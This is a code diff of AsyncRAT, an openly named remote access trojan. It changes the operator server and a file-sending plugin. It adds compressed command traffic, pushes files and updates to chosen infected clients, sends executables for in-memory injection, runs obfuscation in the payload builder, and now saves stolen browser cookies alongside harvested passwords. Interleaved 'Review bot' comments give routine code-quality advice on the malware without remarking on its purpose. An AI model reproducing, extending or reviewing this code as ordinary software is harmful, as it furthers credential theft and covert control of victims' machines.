--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj @@ -56,6 +56,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Server/Algorithm/Zip.cs b/AsyncRAT-C#/Server/Algorithm/Zip.cs new file mode 100644 index 0000000..433d945 --- /dev/null +++ b/AsyncRAT-C#/Server/Algorithm/Zip.cs 
@@ -0,0 +1,46 @@
+using System;
+using System.IO;
+using System.IO.Compression;
+using System.Threading.Tasks;
+
+namespace Server.Algorithm
+{
+ public static class Zip
+ {
+ public static byte[] Decompress(byte[] input)
+ {
+ using (var source = new MemoryStream(input))
+ {
+ byte[] lengthBytes = new byte[4];
+ source.Read(lengthBytes, 0, 4);
+
+ var length = BitConverter.ToInt32(lengthBytes, 0);
+ using (var decompressionStream = new GZipStream(source,
+ CompressionMode.Decompress))
+ {
+ var result = new byte[length];
+ decompressionStream.Read(result, 0, length);
+ return result;
+ }
+ }
+ }
+
+ public static byte[] Compress(byte[] input)
+ {
+ using (var result = new MemoryStream())
+ {
+ var lengthBytes = BitConverter.GetBytes(input.Length);
+ result.Write(lengthBytes, 0, 4);
+
+ using (var compressionStream = new GZipStream(result,
+ CompressionMode.Compress))
+ {
+ compressionStream.Write(input, 0, input.Length);
+ compressionStream.Flush();
+
+ }
+ return result.ToArray();
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Server/Connection/Clients.cs b/AsyncRAT-C#/Server/Connection/Clients.cs
index 7b90ba2..6a0e830 100644
--- a/AsyncRAT-C#/Server/Connection/Clients.cs
+++ b/AsyncRAT-C#/Server/Connection/Clients.cs
@@ -89,7 +89,13 @@ namespace Server.Connection
 BytesRecevied += Recevied;
 if (ClientMS.Length == ClientBuffersize)
 {
- ThreadPool.QueueUserWorkItem(new Packet().Read, new object[] { ClientMS.ToArray(), this });
+
+ ThreadPool.QueueUserWorkItem(new Packet
+ {
+ client = this,
+ data = ClientMS.ToArray(),
+ }.Read, null);
+
 ClientBuffer = new byte[4];
 ClientMS.Dispose();
 ClientMS = new MemoryStream();
diff --git a/AsyncRAT-C#/Server/Connection/Listener.cs b/AsyncRAT-C#/Server/Connection/Listener.cs
index ba7919d..3b6cfd2 100644
--- a/AsyncRAT-C#/Server/Connection/Listener.cs
+++ b/AsyncRAT-C#/Server/Connection/Listener.cs
@@ -23,7 +23,7 @@ namespace Server.Connection ReceiveBufferSize = 50 * 1024, }; Server.Bind(ipEndPoint); - Server.Listen(100); + Server.Listen(500); new HandleLogs().Addmsg($"Listenning {port}", Color.Green); Server.BeginAccept(EndAccept, null); } diff --git a/AsyncRAT-C#/Server/Forms/Form1.cs b/AsyncRAT-C#/Server/Forms/Form1.cs index 88a7dea..66eff05 100644 --- a/AsyncRAT-C#/Server/Forms/Form1.cs +++ b/AsyncRAT-C#/Server/Forms/Form1.cs @@ -570,7 +570,7 @@ namespace Server { MsgPack packet = new MsgPack(); packet.ForcePathObject("Packet").AsString = "sendMemory"; - packet.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(formSend.toolStripStatusLabel1.Tag.ToString())); + packet.ForcePathObject("File").SetAsBytes(Zip.Compress(File.ReadAllBytes(formSend.toolStripStatusLabel1.Tag.ToString()))); if (formSend.comboBox1.SelectedIndex == 0) { packet.ForcePathObject("Inject").AsString = ""; @@ -587,6 +587,7 @@ namespace Server foreach (Clients client in GetSelectedClients()) { + client.LV.ForeColor = Color.Red; ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); } } 
@@ -604,26 +605,32 @@ namespace Server
 {
 try
 {
- OpenFileDialog openFileDialog = new OpenFileDialog();
- openFileDialog.Multiselect = true;
- if (openFileDialog.ShowDialog() == DialogResult.OK)
+ using (OpenFileDialog openFileDialog = new OpenFileDialog())
 {
- MsgPack packet = new MsgPack();
- packet.ForcePathObject("Packet").AsString = "sendFile";
- packet.ForcePathObject("Update").AsString = "false";
-
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "plugin";
- msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll"));
-
- foreach (Clients client in GetSelectedClients())
+ openFileDialog.Multiselect = true;
+ if (openFileDialog.ShowDialog() == DialogResult.OK)
 {
- foreach (string file in openFileDialog.FileNames)
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "sendFile";
+ packet.ForcePathObject("Update").AsString = "false";
+
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll"));
+
+ foreach (Clients client in GetSelectedClients())
 {
- await packet.ForcePathObject("File").LoadFileAsBytes(file);
- packet.ForcePathObject("Extension").AsString = Path.GetExtension(file);
- msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
- ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ client.LV.ForeColor = Color.Red;
+ foreach (string file in openFileDialog.FileNames)
+ {
+ await Task.Run(() =>
+ {
+ packet.ForcePathObject("File").SetAsBytes(Zip.Compress(File.ReadAllBytes(file)));
+ packet.ForcePathObject("Extension").AsString = Path.GetExtension(file);
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+ });
+ ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ }
 }
 }
 }
@@ -1050,27 +1057,30 @@ namespace Server } } - private async void UpdateToolStripMenuItem2_Click(object sender, EventArgs e) + private void UpdateToolStripMenuItem2_Click(object sender, EventArgs e) { try { - OpenFileDialog openFileDialog = new OpenFileDialog(); - if (openFileDialog.ShowDialog() == DialogResult.OK) + using (OpenFileDialog openFileDialog = new OpenFileDialog()) { - MsgPack packet = new MsgPack(); - packet.ForcePathObject("Packet").AsString = "sendFile"; - await packet.ForcePathObject("File").LoadFileAsBytes(openFileDialog.FileName); - packet.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName); - packet.ForcePathObject("Update").AsString = "true"; - - MsgPack msgpack = new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "plugin"; - msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll")); - msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes()); - - foreach (Clients client in GetSelectedClients()) + if (openFileDialog.ShowDialog() == DialogResult.OK) { - ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); + MsgPack packet = new MsgPack(); + packet.ForcePathObject("Packet").AsString = "sendFile"; + packet.ForcePathObject("File").SetAsBytes(Zip.Compress(File.ReadAllBytes(openFileDialog.FileName))); + packet.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName); + packet.ForcePathObject("Update").AsString = "true"; + + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "plugin"; + msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll")); + msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes()); + + foreach (Clients client in GetSelectedClients()) + { + client.LV.ForeColor = Color.Red; + ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes()); + } } } } 
diff --git a/AsyncRAT-C#/Server/Forms/FormAbout.Designer.cs b/AsyncRAT-C#/Server/Forms/FormAbout.Designer.cs index d32b896..1649386 100644 --- a/AsyncRAT-C#/Server/Forms/FormAbout.Designer.cs +++ b/AsyncRAT-C#/Server/Forms/FormAbout.Designer.cs @@ -44,9 +44,7 @@ this.richTextBox1.ShortcutsEnabled = false; this.richTextBox1.Size = new System.Drawing.Size(557, 210); this.richTextBox1.TabIndex = 0; - this.richTextBox1.Text = "\n │ Author : NYAN CAT\n │ Name : AsyncRAT © 2019\n │ C" + - "ontact : github.com/NYAN-x-CAT\n\n This program is distributed for educat" + - "ional purposes only.\n\n"; + this.richTextBox1.Text = resources.GetString("richTextBox1.Text"); this.richTextBox1.ZoomFactor = 1.1F; // // FormAbout diff --git a/AsyncRAT-C#/Server/Forms/FormAbout.resx b/AsyncRAT-C#/Server/Forms/FormAbout.resx index f4aca47..407f1e1 100644 --- a/AsyncRAT-C#/Server/Forms/FormAbout.resx +++ b/AsyncRAT-C#/Server/Forms/FormAbout.resx @@ -117,6 +117,16 @@ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + │ Author NYAN CAT + │ Name AsyncRAT © 2019 + │ Page GitHub.com/NYAN-x-CAT + │ Twitter Twitter.com/NYAN_x_CAT + + This program is distributed for educational purposes only. + + diff --git a/AsyncRAT-C#/Server/Forms/FormBuilder.cs b/AsyncRAT-C#/Server/Forms/FormBuilder.cs index 38bb926..37cbdc5 100644 --- a/AsyncRAT-C#/Server/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/Server/Forms/FormBuilder.cs @@ -203,7 +203,10 @@ namespace Server.Forms if (chkObfu.Checked) { //EncryptString.DoEncrypt(asmDef); - Renaming.DoRenaming(asmDef); + await Task.Run(() => + { + Renaming.DoRenaming(asmDef); + }); } asmDef.Write(saveFileDialog1.FileName); asmDef.Dispose(); diff --git a/AsyncRAT-C#/Server/Forms/FormSendFileToMemory.cs b/AsyncRAT-C#/Server/Forms/FormSendFileToMemory.cs index 63bedca..64ee7cf 100644 --- a/AsyncRAT-C#/Server/Forms/FormSendFileToMemory.cs +++ b/AsyncRAT-C#/Server/Forms/FormSendFileToMemory.cs 
@@ -45,38 +45,37 @@ namespace Server private void button1_Click(object sender, EventArgs e) { - OpenFileDialog O = new OpenFileDialog() + using (OpenFileDialog O = new OpenFileDialog()) { - Filter = "(*.exe)|*.exe" - }; - if (O.ShowDialog() == DialogResult.OK) - { - toolStripStatusLabel1.Text = Path.GetFileName(O.FileName); - toolStripStatusLabel1.Tag = O.FileName; - toolStripStatusLabel1.ForeColor = Color.Green; - IsOK = true; - if (comboBox1.SelectedIndex == 0) + O.Filter = "(*.exe)|*.exe"; + if (O.ShowDialog() == DialogResult.OK) { - try + toolStripStatusLabel1.Text = Path.GetFileName(O.FileName); + toolStripStatusLabel1.Tag = O.FileName; + toolStripStatusLabel1.ForeColor = Color.Green; + IsOK = true; + if (comboBox1.SelectedIndex == 0) { - new ReferenceLoader().AppDomainSetup(O.FileName); - IsOK = true; - } - catch - { - toolStripStatusLabel1.ForeColor = Color.Red; - toolStripStatusLabel1.Text += " Invalid!"; - IsOK = false; + try + { + new ReferenceLoader().AppDomainSetup(O.FileName); + IsOK = true; + } + catch + { + toolStripStatusLabel1.ForeColor = Color.Red; + toolStripStatusLabel1.Text += " Invalid!"; + IsOK = false; + } } } + else + { + toolStripStatusLabel1.Text = ""; + toolStripStatusLabel1.ForeColor = Color.Black; + IsOK = true; + } } - else - { - toolStripStatusLabel1.Text = ""; - toolStripStatusLabel1.ForeColor = Color.Black; - IsOK = true; - } - } private void button2_Click(object sender, EventArgs e) diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs index cf2f77b..e0403df 100644 --- a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs +++ b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs @@ -63,7 +63,7 @@ namespace Server.Handle_Packet try { lock (Settings.LockListviewClients) - if (client != null && client.LV != null) + if (client.LV != null) client.LV.ForeColor = Color.Empty; } catch { } 
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs b/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs index 3e382a6..9731f5b 100644 --- a/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs +++ b/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs @@ -19,21 +19,25 @@ namespace Server.Handle_Packet { string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder\\" + unpack_msgpack.ForcePathObject("Hwid").AsString + "\\Recovery"); string pass = unpack_msgpack.ForcePathObject("Password").AsString; - //string cookies = unpack_msgpack.ForcePathObject("Cookies").AsString; - if (!string.IsNullOrWhiteSpace(pass))// || !string.IsNullOrWhiteSpace(cookies)) + string cookies = unpack_msgpack.ForcePathObject("Cookies").AsString; + if (!string.IsNullOrWhiteSpace(pass) || !string.IsNullOrWhiteSpace(cookies)) { if (!Directory.Exists(fullPath)) Directory.CreateDirectory(fullPath); File.WriteAllText(fullPath + "\\Password_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", pass.Replace("\n", Environment.NewLine)); - //File.WriteAllText(fullPath + "\\Cookies_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", cookies.Replace("\n", Environment.NewLine)); + File.WriteAllText(fullPath + "\\Cookies_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", cookies); new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} recovered passwords successfully", Color.Purple); } else { new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} has no passwords", Color.MediumPurple); } + client?.Disconnected(); + } + catch (Exception ex) + { + new HandleLogs().Addmsg(ex.Message, Color.Red); } - catch { } } } } \ No newline at end of file diff --git a/AsyncRAT-C#/Server/Handle Packet/Packet.cs b/AsyncRAT-C#/Server/Handle Packet/Packet.cs index 9259968..e9cd878 100644 --- a/AsyncRAT-C#/Server/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Server/Handle Packet/Packet.cs 
@@ -8,14 +8,13 @@ namespace Server.Handle_Packet
 {
 public class Packet
 {
- public void Read(object Obj)
+ public Clients client;
+ public byte[] data;
+
+ public void Read(object o)
 {
- Clients client = null;
 try
 {
- object[] array = Obj as object[];
- byte[] data = (byte[])array[0];
- client = (Clients)array[1];
 MsgPack unpack_msgpack = new MsgPack();
 unpack_msgpack.DecodeFromBytes(data);
diff --git a/AsyncRAT-C#/Server/Helper/Methods.cs b/AsyncRAT-C#/Server/Helper/Methods.cs
index b33381e..315a519 100644
--- a/AsyncRAT-C#/Server/Helper/Methods.cs
+++ b/AsyncRAT-C#/Server/Helper/Methods.cs
@@ -2,6 +2,7 @@
 using Server.Algorithm;
 using Server.Handle_Packet;
 using System;
+using System.Diagnostics;
 using System.Drawing;
 using System.IO;
 using System.Text;
@@ -49,7 +50,11 @@ namespace Server.Helper
 {
 foreach (string plugin in Directory.GetFiles("Plugins", "*.dll", SearchOption.TopDirectoryOnly))
 {
- Settings.Plugins.Add(GetHash.GetChecksum(plugin), Strings.StrReverse(Convert.ToBase64String(File.ReadAllBytes(plugin))));
+ Settings.Plugins.Add(GetHash.GetChecksum(plugin), Strings.StrReverse(Convert.ToBase64String(Zip.Compress(File.ReadAllBytes(plugin)))));
+#if DEBUG
+ byte[] plg = Zip.Compress(File.ReadAllBytes(plugin));
+ Debug.WriteLine($"{plugin} : {BytesToString(plg.Length)}");
+#endif
 }
 }
 catch (Exception ex)
diff --git a/AsyncRAT-C#/Server/ILMerge.props b/AsyncRAT-C#/Server/ILMerge.props
index aaadb12..b0fc9d2 100644
--- a/AsyncRAT-C#/Server/ILMerge.props
+++ b/AsyncRAT-C#/Server/ILMerge.props
@@ -41,7 +41,7 @@ - + false
diff --git a/AsyncRAT-C#/Server/MessagePack/MsgPack.cs b/AsyncRAT-C#/Server/MessagePack/MsgPack.cs
index b855384..59d7747 100644
--- a/AsyncRAT-C#/Server/MessagePack/MsgPack.cs
+++ b/AsyncRAT-C#/Server/MessagePack/MsgPack.cs
@@ -10,6 +10,7 @@
 * * Credit -> github.com/ymofen/SimpleMsgPack.Net */
+using Server.Algorithm;
 using System;
 using System.Collections;
 using System.Collections.Generic;
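Review bot: In Packet.cs `Read(object o)` no longer uses its parameter in the lines shown and takes its input from the public mutable fields `client` and `data`, so nothing stops a caller from invoking `Read` before both are assigned or from changing them while a read is in progress. Setting them through a constructor into `private readonly` fields, or starting `Read` with `if (data == null || client == null) return;`, would make the contract explicit. If `o` is kept only to match a callback signature (the caller is not visible here), a one-line comment saying so would help. The body of `Read` continues past the hunk.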
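Review bot: In Methods.cs the `#if DEBUG` block reads and compresses each plugin file a second time only to print its size. Compute the array once before the `Add` call with `byte[] plg = Zip.Compress(File.ReadAllBytes(plugin));`, pass `plg` to `Convert.ToBase64String`, and leave only the `Debug.WriteLine` inside `#if DEBUG`. That also guarantees the logged size is the size of the bytes actually stored. `Zip.Compress` and `BytesToString` are defined outside this hunk.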
@@ -498,6 +499,7 @@ namespace Server.MessagePack
 {
 using (MemoryStream ms = new MemoryStream())
 {
+ bytes = Zip.Decompress(bytes);
 ms.Write(bytes, 0, bytes.Length);
 ms.Position = 0;
 DecodeFromStream(ms);
@@ -839,7 +841,7 @@ namespace Server.MessagePack
 byte[] r = new byte[ms.Length];
 ms.Position = 0;
 ms.Read(r, 0, (int)ms.Length);
- return r;
+ return Zip.Compress(r);
 }
 }
diff --git a/AsyncRAT-C#/Server/Server.csproj b/AsyncRAT-C#/Server/Server.csproj
index 7c81798..92ac80e 100644
--- a/AsyncRAT-C#/Server/Server.csproj
+++ b/AsyncRAT-C#/Server/Server.csproj
@@ -8,7 +8,7 @@ {7767C300-5FD5-4A5D-9D4C-59559CCE48A3} WinExe Server - AsyncRAT-Sharp + AsyncRAT v4.6 512 true
@@ -81,6 +81,7 @@ + Form
diff --git a/AsyncRAT-C#/Server/Settings.cs b/AsyncRAT-C#/Server/Settings.cs
index 52e96ff..520f957 100644
--- a/AsyncRAT-C#/Server/Settings.cs
+++ b/AsyncRAT-C#/Server/Settings.cs
@@ -15,7 +15,7 @@ namespace Server
 public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
 public static X509Certificate2 ServerCertificate;
- public static readonly string Version = "AsyncRAT 0.5.4";
+ public static readonly string Version = "AsyncRAT 0.5.4B";
 public static object LockListviewClients = new object();
 public static object LockListviewLogs = new object();
 public static object LockListviewThumb = new object();
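Review bot: In MsgPack.cs the added `bytes = Zip.Decompress(bytes);` runs on every buffer handed to the decoder before any validation, and the hunk shows no bound on the decompressed size. `Zip.Decompress` is not part of this hunk; if it inflates into an unbounded stream, a small input can expand into a very large allocation, and a buffer that is not valid gzip will throw from inside the decoder. The usual mitigation is to cap the output length while inflating, reject input that exceeds the cap, and handle the invalid-data exception at this call site. The method signature is outside the hunk.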